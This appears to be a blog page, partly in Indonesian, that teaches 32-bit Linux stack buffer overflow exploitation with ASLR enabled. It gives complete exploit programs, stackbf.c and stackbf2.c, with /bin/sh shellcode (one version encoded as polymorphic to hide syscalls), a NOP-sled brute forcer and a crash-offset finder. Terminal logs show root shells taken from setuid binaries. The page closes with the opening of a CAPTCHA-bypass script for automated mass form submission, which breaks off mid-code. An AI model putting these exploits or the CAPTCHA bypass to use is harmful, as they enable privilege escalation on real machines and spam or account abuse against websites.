easy pwn on smashme13
Here it is my tools in action…
The challenge is to smash this program with ASLR…
And gaining root acess…
You can found real source here : http://www.shell-storm.org/smashme/files/smashme-13.php
/* Compiled on x86 64 bits*/
#include <stdio.h>
#include <string.h>
int smash(char*);
int main(int argc, char** argv)
{
if (argc < 2) {
fprintf(stderr, "usage: smashme <string>\n");
exit(1);
}
smash(argv[1]);
return 0;
}
int smash(char* egg)
{
char buff[128];
strcat(buff, egg);
return 0;
}
Action…
gunslinger@c0debreaker:~/bof$ vim smashme13.c gunslinger@c0debreaker:~/bof$ gcc -o smashme13 -fno-stack-protector -mpreferred-stack-boundary=2 -g smashme13.c smashme13.c: In function ‘main’: smashme13.c:12: warning: incompatible implicit declaration of built-in function ‘exit’ gunslinger@c0debreaker:~/bof$ gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/smashme13 -s 1 -e 600 Buffer brute force Programmer : gunslinger_ <yudha.gunslinger@gmail.com> [*] Checking Existing application [Ok] [*] Checking perl [Ok] [*] Preparing for bruteforcing buffer [Ok] [*] buffering on 128 byte(s) [!] Application got segmentation fault by giving 128 byte(s) into buffer !! gunslinger@c0debreaker:~/bof$ ./stackbf2 smashme13 132 [*] Using return address 0xbf8f9fe4 [*] Environment variable 128 kb [*] Shellcode size 57 bytes ^C gunslinger@c0debreaker:~/bof$ ./smashme13 usage: smashme <string> gunslinger@c0debreaker:~/bof$ ./smashme13 a gunslinger@c0debreaker:~/bof$ ./smashme13 `perl -e 'print "A" x 128'` Segmentation fault gunslinger@c0debreaker:~/bof$ gdb smashme13 GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... (gdb) r `perl -e 'print "A" x 132'` Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 132'` Program received signal SIGSEGV, Segmentation fault. 0x08048408 in __do_global_dtors_aux () Current language: auto; currently asm (gdb) r `perl -e 'print "A" x 128'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 128'` Program received signal SIGSEGV, Segmentation fault. 0xbfe138a4 in ?? () (gdb) r `perl -e 'print "A" x 150'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 150'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) r `perl -e 'print "A" x 148'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 148'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) r `perl -e 'print "A" x 144'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 144'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) r `perl -e 'print "A" x 142'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 142'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) r `perl -e 'print "A" x 140'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 140'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) r `perl -e 'print "A" x 120'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 120'` Program exited normally. (gdb) r `perl -e 'print "A" x 135'` Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 135'` Program received signal SIGSEGV, Segmentation fault. 0x00414141 in ?? () (gdb) r `perl -e 'print "A" x 136'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/smashme13 `perl -e 'print "A" x 136'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) disas main Dump of assembler code for function main: 0x08048454 <main+0>: push %ebp 0x08048455 <main+1>: mov %esp,%ebp 0x08048457 <main+3>: sub $0x10,%esp 0x0804845a <main+6>: cmpl $0x1,0x8(%ebp) 0x0804845e <main+10>: jg 0x8048491 <main+61> 0x08048460 <main+12>: mov 0x804a01c,%eax 0x08048465 <main+17>: mov %eax,0xc(%esp) 0x08048469 <main+21>: movl $0x18,0x8(%esp) 0x08048471 <main+29>: movl $0x1,0x4(%esp) 0x08048479 <main+37>: movl $0x8048590,(%esp) 0x08048480 <main+44>: call 0x8048368 <fwrite@plt> 0x08048485 <main+49>: movl $0x1,(%esp) 0x0804848c <main+56>: call 0x8048388 <exit@plt> 0x08048491 <main+61>: mov 0xc(%ebp),%eax 0x08048494 <main+64>: add $0x4,%eax 0x08048497 <main+67>: mov (%eax),%eax 0x08048499 <main+69>: mov %eax,(%esp) 0x0804849c <main+72>: call 0x80484a8 <smash> 0x080484a1 <main+77>: mov $0x0,%eax 0x080484a6 <main+82>: leave 0x080484a7 <main+83>: ret End of assembler dump. (gdb) q The program is running. Exit anyway? (y or n) y gunslinger@c0debreaker:~/bof$ ./stackbf2 smashme13 136 [*] Using return address 0xbfab19a4 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # id uid=1000(gunslinger) gid=1000(gunslinger) euid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger) # whoami root # uname -a Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux # exit gunslinger@c0debreaker:~/bof$
stackbf2.c
This is newer version of stackbf
i use
static inline getesp()
{
__asm__("movl %esp,%eax"); /* will get return address in %eax, no more debugging for that ;) */
}
For return address, because that is has a good accuracy so i use that .
/*
* stack brute forcer by Gunslinger_ yudha.gunslinger@gmail.com
* This is version 2 of stackbf.c
* The difference is we doesn't use our own return address , because some asm that copied %esp register into %eax register
* This return value can be use with good accuracy, so we use for that .
*
* # original assembly of shellcode, but there is has been encoded to polymorphic shellcode for hidding some character like "\xcd\x80" or "int $0x80" in assembly
* .global _start
* _start:
*
* xor %eax, %eax
* xor %ebx, %ebx
* xor %ecx, %ecx
* xor %edx, %edx
*
* mov $0xb, %al
* push %ebx
* push $0x68732f2f
* push $0x6e69622f
* mov %esp, %ebx
* xor %edx, %edx
* xor %edx, %edx
* push %ebx
* int $0x80
*
* inc %eax
* int $0x80
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
/* Length of environment variable ~ 128 Kb */
#define ENV_LEN 128000
static inline getesp()
{
__asm__("movl %esp,%eax"); /* will get return address in %eax, no more debugging for that ;) */
}
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x35\x80\xe9\x01" /* Polymorphic shell */
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\xfe"
"\x66\x07\xe5\x40\x88\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3"
"\xbe\x18\x66\x07\x66\xfe\x88\x02\xb5\x75\x02\xb5";
int main(int argc, char **argv)
{
char *application = NULL;
char *buffer = NULL;
char env_var[ENV_LEN];
char *env[2] = { env_var, NULL};
int *p, num, ret, pid, payload_size;
if (argc < 3)
{
printf("\nStack Brute Force");
printf("\nProgrammer : Gunslinger_");
printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
exit(1);
}
printf("[*] Using return address 0x%x \n", getesp());
printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
printf("[*] Shellcode size %d bytes\n", strlen(shellcode));
application = strdup(argv[1]);
payload_size = atoi(argv[2]);
buffer = (char*) malloc(payload_size);
memset (env_var, NOP, ENV_LEN);
memcpy (env_var+ENV_LEN-strlen(shellcode)-1, shellcode, strlen(shellcode));
env_var[ENV_LEN-1]=0;
p = (int*) buffer;
for (num = 0; num < payload_size; num += sizeof(int), p++)
*p = getesp();
*p=0;
do {
switch(pid=fork())
{
case 0:
execle (application, application, buffer, NULL, env);
exit(0);
break;
default:
waitpid (pid, &ret, 0);
break;
}
}
while (ret);
}
and this is the program in action
gunslinger@codebreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space 2 gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 [*] Using return address 0xbf941d04 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # exit gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 [*] Using return address 0xbfeb4a74 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # exit gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 [*] Using return address 0xbfdabfc4 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # exit gunslinger@codebreaker:~/bof$ ./stackbf2 bof 408 [*] Using return address 0xbfbdc7a4 [*] Environment variable 128 kb [*] Shellcode size 57 bytes # exit gunslinger@codebreaker:~/bof$
stackbf.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
You can use debugger to get esp address, that can make program will be defeated more faster !
RET is return address we use to overwrite EIP . we can use 0xbffffff4 for default, but may take sometime...
*/
#define RET 0xbffffff4 // you may change this
#define NOP 0x90
// Length of environment variable ~ 128 Kb
#define ENV_LEN 128000
char shellcode[] =
/*
; standard /bin//sh
global _start
_start:
xor eax,eax
push byte 11
pop eax
push ebx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
xor edx,edx
push ebx
int 0x80
*/
"\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int main(int argc, char **argv)
{
char *application = NULL;
char *buffer = NULL;
char env_var[ENV_LEN];
char *env[2] = { env_var, NULL};
int *p, num, ret, pid, payload_size;
if (argc < 3)
{
printf("\nStack Brute Force");
printf("\nProgrammer : Gunslinger_");
printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
exit(1);
}
printf("[*] Using return address 0x%x \n", RET);
printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
printf("[*] Shellcode size %d bytes\n", strlen(shellcode));
application = strdup(argv[1]);
payload_size = atoi(argv[2]);
buffer = (char*) malloc(payload_size);
memset (env_var, NOP, ENV_LEN);
memcpy (env_var+ENV_LEN-strlen(shellcode)-1, shellcode, strlen(shellcode));
env_var[ENV_LEN-1]=0;
p = (int*) buffer;
for (num = 0; num < payload_size; num += sizeof(int), p++)
*p = RET;
*p=0;
do {
switch(pid=fork())
{
case 0:
execle (application, application, buffer, NULL, env);
exit(0);
break;
default:
waitpid (pid, &ret, 0);
break;
}
}
while (ret);
}
Linux Buffer Overflow Tutorial III
Linux Buffer Overflow Tutorial
Edisi : Ketiga
Penulis : gunslinger_
Web : http://gunslingerc0de.wordpress.com
Tanggal : Sat Jul 24 20:01:54 WIT 2010
Konten :
0×01. Pendahuluan
0×02. Skenario
0×03. Kesimpulan
0×04. Special thanks
0×05. Stuff
0×01. Pendahuluan
~~~~~~~~~~~~~~~~~
Sebelumnya saya telah menulis artikel buffer overflow dengan 2 tehnik berbeda .
namun, dalam artikel tersebut kita tidak memakai randomisasi stack (ASLR) dan kita bisa mengalokasikan memory dengan mudah .
pada artikel kali ini saya akan menjelaskan tehnik buffer overflow dengan memakai randomisasi stack (ASLR).
ASLR adalah singkatan dari Address Space Layout randomization .
dengan kata lain, kita akan mengeksploitasi aplikasi buffer overflow dengan return address yang dinamis .
maka mengeksploitasi dengan mengalokasikan return adress memory pada satu waktu hanya percuma saja
karena pada waktu berbeda kita akan mendapatkan address yang berbeda (dinamis).
akan tetapi, ASLR tidak begitu kuat dalam mesin 32 bit .
faktanya, beberapa Linux kernel dikompilisasi dalam 23 bits dengan tujuan untuk mengidentifikasi relatif address
di dalam stack dimana ruang address dapat teralokasi .
” 2 ^ 23 == 8388608 atau 8 MB “
Hal tersebut berarti base stack address menggunakan address yang jatuh pada letak yang tidak dipastikan (random)
tetapi dalam hal random tersebut, hanya berada dalam jangkauan 8388608 byte atau 8 MB pada memori .
jika kita memanggil program yang rentan terhadap serangan melalui variabel environment yang sangat panjang
sebut saja 128 KB, dimana kebanyakan dari variabel environment tersebut adalah diisi dengan NOP ~ No OPeration (0×90) atau junk “A” (0×41) .
dan pada akhir variable environment tersebut kita tempatkan shellcode kita .
dan apa yang akan terjadi ? cepat atau lambat setelah melewati beberapa kali proses
pengeksekusian tersebut akan menempatkan kita pada address yang kita inginkan .
No OPeration (NOP) atau junk “A” akan naik 1 demi 1 sampai pengeksekusian shellcode berhasil .
tehnik ini hampir sama dengan tehnik pada artikel buffer overflow kedua yang saya buat .
anda bisa lihat di http://www.exploit-db.com/papers/14108/ .
Dan jika kita mengeksekusikannya lewat exec*e (execve atau execle) melewati proses aplikasi yang rentan tersebut
Contoh : variable environment kita berisi NOP atau junk + shellcode dengan panjang 128 KB .
coba kita hitung berapa persen payload kita dalam ruang address .
” 128000 / 8000000 x 100% = 1.525878906% atau 1.6%”
Dalam perhitungan berikut membuktikan bahwa payload kita yang berukuran 128 KB .
mempunyai 1.525878906% (persen) atau 1.6% dari seluruh ruang address 100% ~ 8388608 bytes atau 8 MB .
jadi kita mempunyai kesempatan 1.6% dan akan semakin dekat dengan buffer yang rentan tersebut .
tentu saja kita akan membuat program yang akan mengexploitasi secara automatis
karena kita akan mau tes 1 per 1 secara manual ~ That’s was a very bad jokes isn’t it ? ;)
0×02. Skenario
~~~~~~~~~~~~~~
Pada skenario dalam tutorial ini, kita mendapatkan kasus ada aplikasi yang rentan terhadap buffer overflow .
namun karena kita hanya user biasa (non-root) tentu kita tidak dapat mematikan ASLR untuk mengekploitasi aplikasi tersebut .
mari kita buat saja skenario tersebut .
gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space
2
gunslinger@c0debreaker:~/bof$ vim bof.c
gunslinger@c0debreaker:~/bof$ cat bof.c
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[400];
strcpy(buffer, argv[1]);
return 0;
}
gunslinger@c0debreaker:~/bof$ gcc -o bof -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
gunslinger@c0debreaker:~/bof$ sudo chown root:root bof
[sudo] password for gunslinger:
gunslinger@c0debreaker:~/bof$ sudo chmod 4755 bof
gunslinger@c0debreaker:~/bof$
Skenario berhasil di buat .
Sekarang kita harus mencari berapa bytes yang di perlukan untuk mengoverwrite eip .
kita tidak perlu mencari secara manual berapa bytes yang kita butuhkan
untuk mencari beberapa bytes yang di berikan agar si vilnerable program mengalami crash seperti artikel sebelumnya .
karena kita bisa pakai aplikasi yang saya buat .
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
Usage: ./bufferbruteforce.py [options]
Options: -a, --application <path-to-application> | Target application for bruteforcing buffer
-s, --start <int> | start byte for bruteforcing buffer
-e, --end <int> | end byte for bruteforcing buffer
-h, --help <help> | print this help
Example: ./bufferbruteforce.py -a /home/gunslinger/bufferoverflow/bof -s 1 -e 500
gunslinger@c0debreaker:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/bof -s 1 -e 500
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
[*] Checking Existing application [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 404 byte(s)
[!] Application got segmentation fault by giving 404 byte(s) into buffer !!
gunslinger@c0debreaker:~/bof$
Ok sudah di temukan 404 bytes yang di perlukan untuk membuat vulnerable program tersebut mengalami crash .
sekarang kita cari berapa bytes yang di perlukan untuk membuat register eip tersebut teroverwrite .
gunslinger@c0debreaker:~/bof$ gdb bof GNU gdb 6.8-debian Copyright (C) 2008 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu"... (gdb) r `perl -e 'print "A" x 406'` Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 406'` Program received signal SIGSEGV, Segmentation fault. 0xb7004141 in ?? () (gdb) r `perl -e 'print "A" x 407'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 407'` Program received signal SIGSEGV, Segmentation fault. 0x00414141 in ?? () (gdb) r `perl -e 'print "A" x 408'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/bof `perl -e 'print "A" x 408'` Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) i r eip eip 0x41414141 0x41414141 (gdb)
Eip teroverwrite total dengan huruf “A” tersebut .
Dan payload kita akan berukuran 408 bytes juga .
Sekarang kita lakukan debugging untuk menentukan perkiraan register esp (stack pointer) dan kita ambil salah satunya .
karena register tersebut tidak akan jatuh pada alamat yang statis .
pertama kita disassemble dulu dimana fungsi strcpy tersebut .
(gdb) disas main Dump of assembler code for function main: 0x080483c4 <main+0>: push %ebp 0x080483c5 <main+1>: mov %esp,%ebp 0x080483c7 <main+3>: sub $0x198,%esp 0x080483cd <main+9>: mov 0xc(%ebp),%eax 0x080483d0 <main+12>: add $0x4,%eax 0x080483d3 <main+15>: mov (%eax),%eax 0x080483d5 <main+17>: mov %eax,0x4(%esp) 0x080483d9 <main+21>: lea -0x190(%ebp),%eax 0x080483df <main+27>: mov %eax,(%esp) 0x080483e2 <main+30>: call 0x80482f8 <strcpy@plt> 0x080483e7 <main+35>: mov $0x0,%eax 0x080483ec <main+40>: leave 0x080483ed <main+41>: ret End of assembler dump. (gdb) b *main+30 Breakpoint 1 at 0x80483e2 (gdb)
yah , terlihat bahwa fungsi strcpy terletak di 0x80483e2
0x080483e2 : call 0x80482f8
sekarang kita akan mencari dimana perkiraan register esp akan jatuh aplikasi tersebut .
(gdb) r hey where is esp ? The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/bof hey where is esp ? Breakpoint 1, 0x080483e2 in main () (gdb) i r esp esp 0xbfeba1f0 0xbfeba1f0 (gdb) r hey where is esp ? The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/bof hey where is esp ? Breakpoint 1, 0x080483e2 in main () (gdb) i r esp esp 0xbf98dcc0 0xbf98dcc0 (gdb) r hey where is esp ? The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/gunslinger/bof/bof hey where is esp ? Breakpoint 1, 0x080483e2 in main () (gdb) i r esp esp 0xbfcc8800 0xbfcc8800 (gdb)
Terlihat bukan ? register esp jatuh pada address yang tidak tetap statis .
pertama kita dapatkan register esp terletak pada address -> 0xbfeba1f0
esp 0xbfeba1f0 0xbfeba1f0
kedua kita dapatkan register esp terletak pada address -> 0xbf98dcc0
esp 0xbf98dcc0 0xbf98dcc0
ketiga kita dapatkan register esp terletak pada address -> 0xbfcc8800
esp 0xbfcc8800 0xbfcc8800
hal itu dikarenakan ASLR yang membuat address tersebut jatuh pada address yang dinamis .
ok, sekarang tinggal kita pilih dari address ketiga tersebut, pada skenario tutorial ini
kita ambil register esp yang pertama kali yaitu : 0xbfeba1f0
dan kita jalankan program pengeksploitasi dengan RET (return address) 0xbfeba1f0 .
gunslinger@c0debreaker:~/bof$ cat /proc/sys/kernel/randomize_va_space 2 gunslinger@c0debreaker:~/bof$ vim stackbf.c gunslinger@c0debreaker:~/bof$ gcc -o stackbf stackbf.c gunslinger@c0debreaker:~/bof$ ./stackbf Stack Brute Force Programmer : gunslinger_ <yudha.gunslinger@gmail.com> Usage: ./stackbf <application> <payload_size> gunslinger@c0debreaker:~/bof$ ./stackbf bof 408 [*] Using return address 0xbfeba1f0 [*] Environment variable 128 kb [*] Shellcode size 28 bytes # id uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger) # whoami root # uname -a Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux # echo GAME OVER GAME OVER # exit gunslinger@c0debreaker:~/bof$
Attack vector berhasil dilancarkan dengan mulus .
namun dapatkah jika return address tersebut di ganti ke address yang lebih rendah ?
coba kita gunakan RET (return address) 0xbffffff4
gunslinger@c0debreaker:~/bof$ vim stackbf.c gunslinger@c0debreaker:~/bof$ gcc -o stackbf stackbf.c gunslinger@c0debreaker:~/bof$ ./stackbf bof 408 [*] Using return address 0xbffffff4 [*] Environment variable 128 kb [*] Shellcode size 28 bytes (...after some second...) # id uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger) # whoami root # uname -a Linux c0debreaker 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux # echo GAME OVER GAME OVER # exit gunslinger@c0debreaker:~/bof$
Berhasil, hanya saja memerlukan waktu beberapa detik untuk spawn shell .
0×03. Kesimpulan
~~~~~~~~~~~~~~~~
Dengan experimen berikut, kita menyimpulkan bahwa ASLR tidak begitu kuat dalam mesin 32 bit.
0×04. Special thanks
~~~~~~~~~~~~~~~~~~~~
Thanks to : devilzc0de crew and jasakom crew
: www.devilzc0de.org / www.devilzc0de.com – www.jasakom.com , indonesianhacker.org, yogyacarderlink.web.id
: serverisdown.org, xc0de.or.id, echo.or.id, hacker-newbie.org, tecon-crew.org
: Scut, jonathan salwan, mywisdom, r0073r, d3hydr8 (we miss you bro), ty myler
: And all exploit database…
0×05. Stuff
~~~~~~~~~~~
——————————————stackbf.c——————————————
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
/*
You can use debugger to get esp address, that can make program will be defeated more faster !
RET is return address we use to overwrite EIP . we can use 0xbffffff4 for default, but may take sometime...
*/
#define RET 0xbffffff4 // you may change this
#define NOP 0x90
// Length of environment variable ~ 128 Kb
#define ENV_LEN 128000
char shellcode[] =
/*
; standard /bin//sh
global _start
_start:
xor eax,eax
push byte 11
pop eax
push ebx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
xor edx,edx
push ebx
int 0x80
*/
"\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";
int main(int argc, char **argv)
{
char *application = NULL;
char *buffer = NULL;
char env_var[ENV_LEN];
char *env[2] = { env_var, NULL};
int *p, num, ret, pid, payload_size;
if (argc < 3)
{
printf("\nStack Brute Force");
printf("\nProgrammer : Gunslinger_");
printf("\nUsage: %s <application> <payload_size>\n\n", argv[0]);
exit(1);
}
printf("[*] Using return address 0x%x \n", RET);
printf("[*] Environment variable %d kb\n", ENV_LEN / 1000);
printf("[*] Shellcode size %d bytes\n", strlen(shellcode));
application = strdup(argv[1]);
payload_size = atoi(argv[2]);
buffer = (char*) malloc(payload_size);
memset (env_var, NOP, ENV_LEN);
memcpy (env_var+ENV_LEN-strlen(shellcode)-1, shellcode, strlen(shellcode));
env_var[ENV_LEN-1]=0;
p = (int*) buffer;
for (num = 0; num < payload_size; num += sizeof(int), p++)
*p = RET;
*p=0;
do {
switch(pid=fork())
{
case 0:
execle (application, application, buffer, NULL, env);
exit(0);
break;
default:
waitpid (pid, &ret, 0);
break;
}
}
while (ret);
}
————————————————-EOF—————————————————
——————————————bufferbruteforce.py——————————————
#!/usr/bin/python
import sys, time, StringIO, commands, re, os, os.path
'''
This is buffer brute forcer program, allow you to brute forcing buffer and know how bytes to make got Segmentation fault .
Written for educational purpose and pentest only. Use it at your own risk .
Toolname : bufferbruteforce.py
Author : gunslinger_ <yudha.gunslinger@gmail.com>
date : Sun Jul 4 00:58:54 WIT 2010
You can use this simple bof.c for testing .
-----------------bof.c-----------------
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[400];
strcpy(buffer, argv[1]);
return 0;
}
------------------EOF------------------
Example usage :
root@c0debreaker:/home/gunslinger/bof# cat bof.c
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[400];
strcpy(buffer, argv[1]);
return 0;
}
root@c0debreaker:/home/gunslinger/bof# echo 0 > /proc/sys/kernel/randomize_va_space
root@c0debreaker:/home/gunslinger/bof# gcc -o bof -g -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
root@c0debreaker:/home/gunslinger/bof# exit
gunslinger@c0debreaker:~/bof$ ./bbf.py -a /home/gunslinger/bof/bof -s 1 -e 500
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
[*] Checking Existing application [Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 404 byte(s)
[!] Application got segmentation fault by giving 404 byte(s) into buffer !!
gunslinger@c0debreaker:~/bof$
'''
'''define color'''
green = '\033[38m'
red = '\033[31m'
reset = '\033[0;0m'
name = sys.argv[0]
fail = "[Failure]"
ok = "[Ok]"
face = '''
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>'''
option = '''
Usage: %s [options]
Options: -a, --application <path-to-application> | Target application for bruteforcing buffer
-s, --start <int> | start byte for bruteforcing buffer
-e, --end <int> | end byte for bruteforcing buffer
-h, --help <help> | print this help
Example: %s -a /home/gunslinger/bufferoverflow/bof -s 1 -e 500
''' % (name,name)
def myface() :
print face
def helpMe() :
myface()
print option
sys.exit(1)
for arg in sys.argv:
if arg.lower() == '-a' or arg.lower() == '--application':
app = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-s' or arg.lower() == '--start':
counter = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-e' or arg.lower() == '--end':
end = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
helpMe()
elif len(sys.argv) <= 1:
helpMe()
def checkingexistingfile():
if os.path.exists(app):
exfile = green+ok
else:
exfile = red+fail
print "\n[*] Checking Existing application \t\t\t\t\t%s%s" % (exfile, reset)
if exfile == red+fail:
print "[*] Please checking your application target path"
exit()
def checkperl():
perl = "perl -e \'print \"A\" x 1\'"
result = StringIO.StringIO(commands.getstatusoutput(perl)[1]).read()
A = re.findall("A", result)
if A:
print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (green, ok, reset)
else:
print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (red, fail, reset)
print "[*] Are perl installed on your system ?"
exit()
def bruteforcebuff():
global counter
print "[*] Preparing for bruteforcing buffer \t\t\t\t\t%s%s%s" % (green, ok, reset)
while counter <= end :
try:
sys.stdout.write("\r[*] buffering on %s%d%s byte(s)" % (red,int(counter),reset))
sys.stdout.flush()
args = app+' '+'`perl -e \'print "A" x '+repr(counter)+'\'`'
SIGSEGV = StringIO.StringIO(commands.getstatusoutput(args)[0]).read()
segmentation_fault = re.findall("35584", SIGSEGV)
if segmentation_fault:
print "\n[!] Application got segmentation fault by giving %s%d%s byte(s) into buffer !!\n" % (red, int(counter), reset)
break
counter = int(counter) + 1
except KeyboardInterrupt:
print "\n[-] Exiting %s" % (name)
sys.exit(1)
def main():
myface()
checkingexistingfile()
checkperl()
bruteforcebuff()
if __name__ == '__main__':
main()
————————————————————–EOF——————————————————–
how to bypassing catpcha
Beberapa tahun lalu, saya telah mendengar bahwa catpcha yang ada pada website seperti gmail, yahoo, dan hotmail berhasil di tembusi oleh para spammer dan hacker elite…
sehingga membuat username2 junk sampai berpuluh2 ribu account .
membuat saya sempat penasaran sekali, namun saya coba mengimplementasikannya minggu lalu dan baru hari ini saya posting…
namun sekarang ini perusahaan besar tersebut sudah menutup hole tersebut .
dan saya juga telah membuat program menggunakan mechanize pada python dan seakan2 seorang manusia sedang surfing ke dengan browser .
karena pada suatu website itu (mohon maaf tidak disebutkan alamat web tersebut) memerlukan cookie dan session, sekaligus keharusan mengalahkan catpcha untuk mensubmit form tersebut . dengan di tambah beberapa module .
dan itu alasan saya menggunakan mechanize di banding urllib, urllib2, atau httplib .
yang membedakan hanyalah ini hanyalah program yang mengulangi sampai akhir yang ditentukan .
tentu jika manusia sudah kelelahan mensubmit 1000 kali saja tentunya ;) .
dan saya pun membuat logikanya seperti berikut .
Program -> Visit web -> Saving cookies -> Saving session -> Downloading catcpha | | | | Breaking catpcha on local system | | | | if catpcha success -> continueing submitting data (with cookie and session of before) -> data submited ! Report to main program <- if not succedded
#!/usr/bin/python
import os.path, urllib2, urllib, StringIO, commands, re, os
from urllib2 import urlopen, Request
COOKIEFILE = 'cookies.lwp' # "cookiejar" file for cookie saving/reloading
# first try getting the best possible solution, cookielib:
try:
import cookielib
except ImportError: # no cookielib, try ClientCookie instead
cookielib = None
try:
import ClientCookie
except ImportError: # nope, no cookies today
cj = None # so, in particular, no cookie jar
else: # using ClientCookie, prepare everything
urlopen = ClientCookie.urlopen
cj = ClientCookie.LWPCookieJar( )
Request = ClientCookie.Request
else: # we do have cookielib, prepare the jar
cj = cookielib.LWPCookieJar( )
# Now load the cookies, if any, and build+install an opener using them
if cj is not None:
if os.path.isfile(COOKIEFILE):
cj.load(COOKIEFILE)
if cookielib:
